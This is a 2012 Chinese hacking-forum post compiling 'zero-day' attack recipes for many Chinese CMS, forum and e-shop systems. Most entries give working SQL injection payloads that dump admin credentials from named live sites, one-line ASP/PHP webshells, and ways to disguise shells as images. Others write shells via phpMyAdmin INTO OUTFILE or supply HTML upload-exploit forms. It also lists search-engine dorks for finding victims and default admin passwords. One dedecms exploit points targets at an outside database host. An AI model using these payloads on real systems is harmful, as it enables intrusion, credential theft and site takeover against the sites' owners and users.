找回密码
 立即注册
查看: 3575|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本3 l" f; c' V% M& N. x( v& [& R
) {/ p  G6 S& J& Y2 p+ f7 ^+ ?" @
直接上exploit:$ h0 D5 w) ?8 a. `- O
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
( |1 ~6 t; |* u  Otest:http://www.tb11.net/system/xitong/shownews.asp?id=210
6 s) x/ X, U' s9 b9 m/ n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, x/ Z2 W. s9 c6 z" O8 f1 [Asprain论坛 注册用户 上传图片就可拿到webshell
" l2 {8 y/ P. u6 O6 g2 a$ r
3 z: ?% H. N# {4 q1 ^% Z1 aAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。, w, @. m0 q  w2 Z7 C) T7 K
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
4 W, x4 n$ E7 q. n9 {! X2.gif 为一小图片文件,一定要小,比如qq表情图片
  D0 o2 Q* V- W* o3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用( t+ \% H/ a9 i# D' z# z( {
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
0 d/ x. W  L2 l! X7 M  Z, ]5.q.asp;.gif: U  x) O2 `+ d- Q
google:Powered by Asprain
# t+ u1 t+ s7 q' A--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; {& w4 H& I2 N# _4 p: P0 @% ~
0 ]2 C' k& {5 j1 K6 mShopNum1全部系统存在上传漏洞。
5 ]  [; z$ _, t; P4 e" e/ [
& @$ b/ d' }! {$ P, U首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
7 D0 s( Y, b. I7 D! t按说明 提示登录后台。。) M4 O* M7 [: k
在后台功能页面->附件管理->附件列表1 e- [' R8 a3 {; |/ z3 w, O' n
可以直接上传.aspx 后缀木马' v9 h! L6 ?- r; s$ {
http://demo.shopnum1.com/upload/20110720083822500.aspx
/ Q/ T& ]8 R& X, @, `5 p0 j--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! F# R- p: W) V- h" @

: N. {4 h2 T  I& o2 o牛牛CMS中小企业网站管理系统 上传漏洞
7 N2 z; d# a3 E6 r
- B6 \6 c# A1 H% T牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。! V/ e6 d. @" {& ~9 @  a
后台:admin/login.asp
3 b' o  W" l+ L, U2 i6 y5 L7 Qewebeditor 5.5 Nday7 `" ?1 F4 b2 J* a% W6 U6 I, D
exp:2 u( l8 c( G' y) P$ m% A! R- Y
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
: ~% u7 U; `0 _* g0 z<input?type=file?name=uploadfile?size=100><br><br>?
5 T) k9 ]# Z0 J  d3 |. V<input?type=submit?value=upload>?( }- _1 u# h; z# y' S7 H! R
</form>
1 G' O6 ^& l  \: Q7 u" \ps:先上传小马." I  a+ b. v, {7 Y/ q+ S& Q& W
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏/ {% ~, |$ ]9 x* h$ p

) x) l* s) w3 F$ r  k" ~--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 U5 T5 G6 a6 x" p/ y1 o
% ^/ b7 K6 ?/ d+ v  X! ]
YothCMS 遍历目录漏洞/ C6 h7 r, S: j6 ~8 N% D

* |0 C2 u& e4 p优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
* z6 O  h1 n! Y2 D1 y& `2 P$ U默认后台:admin/login.asp
& O$ t! x+ X1 m# k% y遍历目录:
: A6 |: E1 {0 U, U1 S5 s4 gewebeditor/manage/upload.asp?id=1&dir=../- w# w" _( Y& w. a* I+ b
data:
( R) K+ K; W) O0 R# _http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
0 k5 p. S1 X  m--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ @' _# D- ^/ E1 P

1 x; h  B4 b8 RNet112企业建站系统 1.0/ X! C) m- T+ V  b7 L

3 K& H) F, J6 m0 H! ~3 I源码简介:# I& Z# N- H5 l2 ?3 s: p! H
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。& T9 i* R- N5 B& ~& l/ J3 P. S& {1 v
添加管理员:2 R3 y6 _. w& Y0 R" N) w
http://www.0855.tv/admin/admin.asp?action=add&level=2
7 @6 V  o" Z8 M! Y0 s; y其实加不加都不是很重要,后台文件都没怎么作验证。# M* H7 Q. C* M: h; `& n- C3 x4 W! R
上传路径:! i, g! f' ?: q: o2 I
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
1 w) V; o% W2 |7 K% Chttp://www.0855.tv/inc/Upfile.asp?Stype=2
- L% ?0 b0 d" [% [$ t+ s( i7 U怎么利用自己研究。
3 `$ S* @  x$ P( X遍历目录:6 G8 _) h" t! `) t* V) x4 p
http://www.0855.tv/admin/upfile.asp?path=../..  g; N0 Z3 Y5 `6 x
如:: T( T. c- Y% N5 o" W4 R5 G
http://www.0855.tv/admin/upfile.asp?path=../admin
/ d% ]* `- i$ F2 v/ X. c7 ^5 x7 r/ Chttp://www.0855.tv/admin/upfile.asp?path=../data: Y  c, I* a+ J, n. r) ?
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 |0 `) n0 `0 Q* ]
& c2 `1 w( Z, t  h0 p
易和阳光购物商城通杀 上传漏洞" `9 P  I( b5 P# P9 d4 o- e' T* r+ C
" h3 E$ G$ u) h) u
前提要求是IIS6.0+asp坏境。! U1 {% S" x# R. w$ L; p8 ~: @! X
漏洞文件Iheeo_upfile.asp
% b, `. }9 p8 L9 {& b8 S1 {9 Q过滤不严.直接可以iis6.0上传
% O3 Y+ N7 g9 t/ U' M% C把ASP木马改成0855.asp;1.gif
7 b1 C, Q4 b: v直接放到明小子上传( P( P  ~, Q2 x3 o. ]; V% Z
Google搜索:inurl:product.asp?Iheeoid=
/ }, ?1 Q5 X' o9 Q# |/ h--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ q2 V9 A1 j" ]$ N0 y" U. [8 ]8 [, |
phpmyadmin后台4种拿shell方法
! c+ W2 S& d. J. v
8 C" q* C4 L0 L& {: |5 J方法一:
* i9 o- }4 T0 \7 w* N& A' D& ?7 iCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
0 o+ Y5 Z$ {$ K+ h& ?: }! T; x9 Q  gINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');8 R2 y9 a! I- G% I* ]4 l' q
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';: V$ o5 c  m; B0 L
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php: Y/ H% o" _4 ~+ w. Q$ A+ k, p
一句话连接密码:xiaoma4 z0 U' y, s9 e1 N2 E/ R6 [
方法二:5 B; |( F* v2 N/ r: ]
Create TABLE xiaoma (xiaoma1 text NOT NULL);4 d' F# i" v5 q0 n* _8 o
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
5 y; E" h3 W$ H5 l2 bselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';  G( p8 k: v+ }* ^0 D. x
Drop TABLE IF EXISTS xiaoma;
+ j  z) d. B5 h1 T( k方法三:2 H7 x$ Z; f1 o
读取文件内容:    select load_file('E:/xamp/www/s.php');
$ R) m( K7 _0 u! I# }+ Q写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
: }8 g7 _/ L8 w7 ^4 Q7 U% _2 Ncmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
7 o$ A7 i% }) M* d; f( K+ @方法四:0 l- p0 G3 V/ t' l% Q, L! F
select load_file('E:/xamp/www/xiaoma.php');; c( P5 U, H& J# F4 m! F/ j3 G4 |
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'9 h1 w0 k* Q( r
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
- D6 J4 d/ B+ d* O9 T; F* \! @, U$ R--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; h- n% C5 U& g) j5 q. r# U! p
+ |; z8 W2 Q1 `3 {8 G
传信网络独立开发网站源码0day漏洞
6 p* e. m1 u6 k% w& B
8 L! k9 E8 h; c1 C后台system/login.asp
% z+ o+ w* R$ D! r* V进了后台有个ewebeditor
9 m5 Y  L4 A) m$ ^# N1 a$ h4 uGoogle 搜索inurl:product1.asp?tyc=
' Z/ X+ ]- l9 B% ?3 E编辑器漏洞默认后台ubbcode/admin_login.asp0 r+ `/ t' _6 e
数据库ubbcode/db/ewebeditor.mdb- r/ J% P/ W8 B
默认账号密码yzm 111111
4 b" A# k! ?; v4 d- C) B* @; ~4 m+ G+ Q; a2 b
拿webshell方法* ~/ H8 t: {" ?
登陆后台点击“样式管理”-选择新增样式
: l9 q0 v. v) v, G+ {; J样式名称:scriptkiddies 随便写
+ c; k) K' b5 h路径模式:选择绝对路径 - P- N- k! Y0 q0 Q. t
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx8 E0 B7 }( `, b* n; b7 H+ f! l
图片类型比如就是我们要上传的ASP木马格式7 X) Y3 }6 S+ P* q- z8 M5 ]
上传路径:// O- W9 V) z' j' ~7 i' Q- ]
图片限制:写上1000 免的上不了我们的asp木马
; n0 F  u8 g# K% g& A" T" V上传内容不要写9 G. z) _( X! V+ u# J* r% ^9 l7 M0 L8 `
可以提交了
$ ^/ `: g( u: A0 t- g9 d样式增加成功!
5 t- l4 L$ ]* [7 E) G) l( J# Q2 ?返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 ) r- a! D7 g8 t  o
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置5 |! A$ t. _$ b& E" B
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies6 ~& n2 c9 p! d" Z! g
上ASP木马 回车 等到路径" m5 a( v: u; j$ x  R7 m
$ F; v% w) {1 _8 E
后台:system/login.asp
8 u5 _6 u6 ^7 }! lExp:" \$ M' Y  E$ [7 E& G2 F3 D/ v: Y6 r
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
2 L: R4 _& ~+ N7 T+ ~; |测试:
; ~  Q, [* @  [; ?, V$ ?9 X7 t: uhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master8 A+ {' s9 Y' J1 Y) U
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
$ o$ J$ x; z1 L& |, B! A; \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# c7 O$ _) z# A2 k# m9 L' S
2 f1 A6 Q& Y' k
foosun 0day 最新注入漏洞
8 R- ], o1 U4 K" @3 }; b
! y6 l6 x) g  j4 f; g: r; R漏洞文件:www.xxx.com/user/SetNextOptions.asp
1 G4 U. m/ N) B  J/ T2 d利用简单的方法:
: J0 m' r8 g/ g/ @, E0 x) B- l暴管理员帐号:: F7 E/ n: M5 G8 @4 m" x2 a
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin5 g$ H- t( l3 ]
暴管理员密码:7 p- {9 T, B3 o  K
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
5 Z. M8 ^( ?3 S* o--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 Y: M6 E. F7 s6 ?2 W3 @  {0 l3 i* ?& D4 V
网站程序的版权未知!
1 ?8 k& i) C& e
2 h7 Z9 p5 A7 N4 {1 ~/ t默认网站数据库:! w0 w  l" e. P* d' x8 z
www.i0day.com/data/nxnews.mdb. L3 a: W* a1 S) V9 H
ewebeditor 在线编辑器:
4 o* {* l) M  X* A编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb8 I! e, U- J* \( z
登录地址:ewebeditor/admin_login.asp
; U3 j& h" \. g! a默认密码:admin  admin/ C$ c1 l8 T. E
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data7 P5 W+ `3 S8 I# M5 e$ d

# J+ r7 e- B( K. i- i# }2 ZSql注入漏洞:0 z# `5 G% D3 _4 V
http://www.i0day.com/detail.asp?id=12
7 \7 L( s% x9 h, hexp:
( d1 j% r2 i: q3 yunion select 1,admin,password,4,5,6,7,8 from admin# i7 W/ F3 e0 F, e' v  g5 H, c* E+ Y
爆出明文帐号/密码
9 }' b1 _$ `7 [  J( I* O7 f# S
( T9 u) ~9 m* \2 k6 l2 \) h" ^上传漏洞:. }* W" h/ `/ l. T6 L
后台+upfile.asp
% {! ~8 T  v$ O% L  c如:$ C  l% S4 K, v+ i
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
8 t0 b! G8 a; Wshell的地址:网址+后台+成功上传的马9 C+ c; W- W* O5 u! ]
google:inurl:news.asp?lanmuName=
( {- {1 e9 t! S  {5 Z" q3 h------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 Q, S. S' p& D7 o7 c2 }7 Z& V
7 ]# B6 ~7 X8 `0 V" i8 W% u
dedecms最新0day利用不进后台直接拿WEBSHELL! A6 y7 j3 U" k. Z+ P
; F  C' E" `7 g; N% I0 }# U7 V
拿webshell的方法如下:
4 a( s' M* w) H  B网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
0 a( @/ \4 L3 d% F前题条件,必须准备好自己的dede数据库,然后插入数据:
( S7 _1 u( x* q/ u; t4 Linsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
4 S. P0 b# L  k/ ^, \8 y! W/ I) z$ r: {5 m% }6 i, P
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。! H9 [# g% _* O, X3 g2 c, X
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
0 E  L7 Y" r6 S& h, V+ n9 {<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
: o$ d. h/ W5 ~# B7 ~4 P" Y<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
$ A6 w# e" i/ o. N<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
" P. B3 D" n) K0 _1 n! I- |<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />% y$ e/ |. u1 }& e
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
3 ~$ J$ z* q% v+ S* P<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
% K+ m7 a' Z' y* B) r: n) q1 i<input type="text" value="true" name="nocache" style="width:400">
# }0 M8 y& B4 M, U<input type="submit" value="提交" name="QuickSearchBtn"><br />1 T, j) @  e+ ]: ^! z$ F; j% l
</form>% D. A3 \/ R  Z; ^2 w  h
<script>
6 M, s' A$ I$ s4 J; Cfunction addaction()
' U5 {  r. k: }8 L% K( X( e3 z{, H2 R. \, A4 L4 W0 H3 ]( {: Y9 X' \
document.QuickSearch.action=document.QuickSearch.doaction.value;! W% k7 P' B& F  R1 b, Z- @
}
4 X$ _/ z* b$ ^2 R* ]# e</script>
* }2 ^$ [& a! |-----------------------------------------------------------------------------------------------------------------------------------------------
4 D' V8 L7 m0 R; t: Q+ r. k
& }# @: w5 k5 n$ Jdedecms织梦暴最新严重0day漏洞
  Y, Y4 l0 o6 q$ nbug被利用步骤如下:; u/ G2 a" g1 l- C- q$ y5 _6 @
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root8 {; f' L( S( Q) V  d4 k3 ^0 ]! B
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
7 |4 v4 n7 d1 @. ]) S& {% ~8 p-------------------------------------------------------------------------------------------------------------------------------------------
) X+ a8 L" A2 Y' v3 g
8 U% H  w( _3 J多多淘宝客程序上传漏洞
$ J1 Y; @- `  t6 ]. @6 b+ E漏洞页面:
' d$ d7 r( s* A' j3 h9 aadmin\upload_pic.php
2 r& O  Y- w5 Z* E传送门:; G8 v% c4 ]' r  U" K$ G& u
http://www.www.com/admin/upload_pic.php?uploadtext=slide19 e+ J. \; T4 P  s3 c; l4 C  i
PS:copy张图片马 直接  xxx.php 上传抓包地址!
$ Y7 F) {, A8 t# R  d------------------------------------------------------------------------------------------------------------------------------------------------------* n7 p& _. N7 H: ]

0 d# l: ~" {  z+ M2 i- h无忧公司系统ASP专业版后台上传漏洞1 _* Y: N  Y( w" N0 D" F. F
漏洞文件 后台上传
& G0 l: l* i, R, U' Q- |  zadmin/uploadPic.asp9 S( B9 E+ O0 }# _3 N6 f
漏洞利用 这个漏洞好像是雷池的1 Y- B% H2 ~, V1 Q8 W$ A$ d( m: v
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=17 h6 S/ I/ c: W7 C( A
等到的webshell路径:
9 d! K0 r8 h% W& ]. {5 m6 i4 M/UploadFiles/scriptkiddies.asp;_2.gif
1 F7 r( x$ a3 a% X0 R---------------------------------------------------------------------------------------------------------------------------------------------------2 J* [2 |" H/ u8 l9 ]" [. T3 e' x
4 b% }, R! B( h
住哪酒店分销联盟系统2010
$ ^! `) T! e) ^Search:  g, }4 B3 G3 t
inurl:index.php?m=hotelinfo) q% k( h/ d. M" I) }/ ?
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
' B6 ~: t0 N% @: G: j/ g" P/ d8 |默认后台:index.php?m=admin/login0 Q6 g) p, I  X, M4 @! F
--------------------------------------------------------------------------------------------------------------------------------------------------
! q$ a) a$ @" T, G5 G5 P
9 @* {. t/ o# a0 Z7 d0 kinurl:info_Print.asp?ArticleID=  |$ ^7 H  _: a, v
后台 ad_login.asp9 [- U+ @. b  f0 q9 _" A4 X: p/ x
爆管理员密码:
' C# j: k" x! }% q5 B. D/ M  J. Zunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
2 M9 X; f6 i. O. {5 J- H+ e------------------------------------------------------------------------------------------------------------------------------------------------------------+ m( b" O/ C' D, x

/ t% p1 S" A/ z+ k" r搜索框漏洞!
& a* G$ T& T0 [" h%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='9 R  j( m* O8 V3 c* \0 a" s; @6 J( `
--------------------------------------------------------------------------------------------------------------------------------------------------------! |4 r6 p. y- X5 n1 U1 Q& Z

, @- J. ?, A7 Q$ e, T关键字:
4 F  ~) g$ G* t. F9 j0 G- n/ kinurl:/reg_TemletSel.asp?step=2
' ~2 t5 n$ F8 J$ B' `或者9 t* @) f$ K3 o2 e
电子商务自助建站--您理想的助手) W( B3 Y( b* N- `6 [
-------------------------------------------------------------------------------------------------------------------------------------------------: W: Y( Y6 x* j

! v6 k- d* ^- P. G; }$ yiGiveTest 2.1.0注入漏洞2 m4 R! j$ a4 Q7 o' }1 u* a
Version: <= 2.1.0
5 D( G  _7 k$ O) d% g/ h# Homepage: http://iGiveTest.com/
0 p  H/ q- p8 ]! j; o4 T谷歌关键字: “Powered by iGiveTest”
3 B# s: a7 @8 F( `3 r. c* m随便注册一个帐号。然后暴管理员帐号和密码6 d$ n8 m' O" K$ W- O5 Y
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
+ X5 p, m- w: p' A# _) _------------------------------------------------------------------------------------------------------------------------------------------------& F9 S9 b0 _# f4 k: b( \7 S" {- A  a

2 ?  j: z6 h+ C2 }, s7 M) KCKXP网上书店注入漏洞% z+ m$ A- Q6 N8 ~3 X6 E4 A. z8 [% A( I
工具加表:shop_admin 加字段:admin
5 {5 X' m7 q+ r; k5 d后台:admin/login.asp - N4 Z6 ^# F8 E+ T9 E: W+ b
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
! }4 n# ~" D, j& R$ R$ f( j9 tinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息/ u7 `; U6 j, L4 w5 }7 i2 D
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. y; c4 @& U+ v6 g

( g. g2 n1 p2 t5 x6 J; W段富超个人网站系统留言本写马漏洞" e3 }" t% G: q& w# V0 |
源码下载:http://www.mycodes.net/24/2149.htm
! N: I. w. u0 t  naddgbook.asp 提交一句话。. W+ T1 C" w' f
连接: http://www.xxxx.tv/date/date3f.asp8 b* G3 Y, X( x
google:为防批量,特略!: R" j1 l$ z9 X5 @+ a
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 m3 K; I. ?' D: X/ u! A9 g3 I
* [9 g# Y* I% \2 g
智有道专业旅游系统v1.0 注入及列目录漏洞
, f% H/ p  B0 `8 D* g1 t默认后台路径:/admin/login.asp
- O/ v: E3 D/ L* C9 \7 S默认管理员:admin. o  w' I" d, B$ ^
默认密码:123456* a2 F% S+ T0 U% z1 I) d( x+ r
SQL EXP Tset:1 g2 I& `& Q' E
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
. B- t- i5 q: e) e; h! j------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 o6 O  w# e8 g- U: V5 t% w4 O+ {
9 I. W  V3 P2 u9 s; O( {! [4 E2 Newebeditor(PHP) Ver 3.8 本任意文件上传0day
( n* P# j1 I" R* m' x2 Y% @* R6 KEXP:
. u) \  Z4 T/ z  C* T/ n* ^<title>eWebeditoR3.8 for php任意文件上EXP</title>
# y. N) S8 s9 ?8 ]- q6 E<form action="" method=post enctype="multip
& U3 `. z7 a3 G/ t& lart/form-data">
+ e, D9 h" ^8 l& S1 \<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> * C. H4 Z4 Y4 ~! ~  V& _
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
, F+ O  G1 A4 u, E* e<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
6 e* g1 x! @6 t! ^9 T; a7 `file:<input type=file name="uploadfile"><br> 0 J4 d7 ~) q9 A8 `0 T
<input type=button value=submit onclick=fsubmit()>
7 [) l  x# D6 j5 a9 y& V</form><br> . i0 n" Q$ r! `' H
<script> 3 _0 R4 \3 E5 Y0 e
function fsubmit(){ + \/ g9 w( o  g4 M8 V7 Y3 u/ ?; P
form = document.forms[0]; 7 M% U; z' Y1 T* G
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
( {& f  F( ]" Z# |% x6 I+ ^; N6 V, ~0 Zalert(form.action);
2 K0 |' c* l0 [0 G9 R1 d: ?form.submit(); 9 C5 y  }+ s) \. h1 N& L% C
} ) w* `, }$ F0 t9 A* _: U
</script>
4 C/ f4 N& ~+ {& B! h! V+ D) c注意修改里面ewebeditor的名称还有路径。
% r# a" y) p$ @2 p+ l9 @6 K& W3 r! x---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 \; Q. W2 @; c4 C% a' X
& }. Q& F+ \( X6 ~7 w提交’时提示ip被记录 防注入系统的利用# \" |6 V1 r) p0 g$ D
网址:http://www.xxx.com/newslist.asp?id=122
9 H1 R4 m  ^  j8 R4 G提示“你的操作已被记录!”等信息。
7 m: ~# P1 e! W* S* L利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。  J0 M; v6 l0 X/ W
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ B- I; e! w( R4 m" @1 t
+ Q2 w4 Z6 A( ]% C5 A
西部商务网站管理系统 批量拿shell-0day
1 z7 R; R' n1 V# B2 i这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 1 s/ v6 {2 v6 Q' X# c4 I/ o
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛4 [' g; m  b& C7 L- A+ T
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合6 Y' M/ H, V0 J5 _
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂% h) F7 o9 z" y. x1 B; u
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------& `7 ]# W) {) z- J
$ z# z/ f# i. O( H
JspRun!6.0 论坛管理后台注入漏洞' z5 r8 b9 ~6 y+ h4 R( R

9 p# _) ?- A/ i0 ~3 F  kSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
0 a& v  S% c& ?3 E# _4 Z! lJspRun!6.0
4 k5 L4 u  c6 G# c漏洞描述:0 C! \1 [7 K9 h2 x4 Z2 n
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。/ g" {; O/ O4 J$ [! c8 A" _# r
在处理后台提交的文件中ForumManageAction.java第1940行' r9 Q  D( Y* _2 N& f5 b3 `
String export = request.getParameter("export");//直接获取,没有安全过滤7 M1 G$ d  d+ D( t" W
if(export!=null){8 J, q  Y. A2 J  S
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
" S: i. E4 t4 Y5 X, Fif(styles==null||styles.size()==0){
8 `  X0 S( P0 j- k<*参考
9 d2 h+ ^! b& Knuanfan@gmail.com
( M5 g7 ~6 X2 g- X9 _. F3 ^*> SEBUG安全建议:
& M1 N6 Q4 U+ ?$ `+ @( ^4 owww.jsprun.net
: I# ?( P( w8 e2 i8 x(1)安全过滤变量export
3 _' k! @; W( W4 t(2)在查询语句中使用占位符( E& |) S& v. y4 X2 m/ u* g' {& N5 v
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& i' i; x1 p) N
* G2 u/ g( R0 Z& X$ A% c乌邦图企业网站系统 cookies 注入
  {  E8 E2 V; Y: A" E$ H- ]3 H: d% Q) |4 z7 I; [; b
程序完整登陆后台:/admin/login.asp% `( R& Q/ s( D" x7 |1 K
默认登陆帐号:admin 密码:admin888
; c0 e+ j( X5 A* ?( [语句:(前面加个空格)
' z5 @  j: Q- {& W! T1 Qand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
4 y; D; Y' _' |7 n: L! j! p' B1 M或者是16个字段:% G9 S. m. o1 }1 D9 W4 P. O
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin- w7 X8 g5 j; ]& S; `
爆不出来自己猜字段。
% N8 w0 s& R! b注入点:http://www.untnt.com/shownews.asp?=88
) N. W3 e0 |+ Y' I3 X0 ^+ `! fgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp( M) H0 n+ `) I5 J4 g* J
关键字:; ^; K* o! I( ~; r+ a/ P
inurl:shownews?asp.id=# a# T6 @  V0 w" G$ x# @; X  `
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------) v  ~& N( r% I( Y
0 o, F. W: R4 J# ^. p
CKXP网上书店注入漏洞7 E( t4 i2 v) |( w; S! V
8 q* i9 h$ R' k% r, @' ~9 K" S% h
工具加表:shop_admin 加字段:admin8 t+ E9 g5 N# o* `: T# X
后台:admin/login.asp 1 H# W, ~# b0 D7 |' j
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/! }, }, B9 K$ i
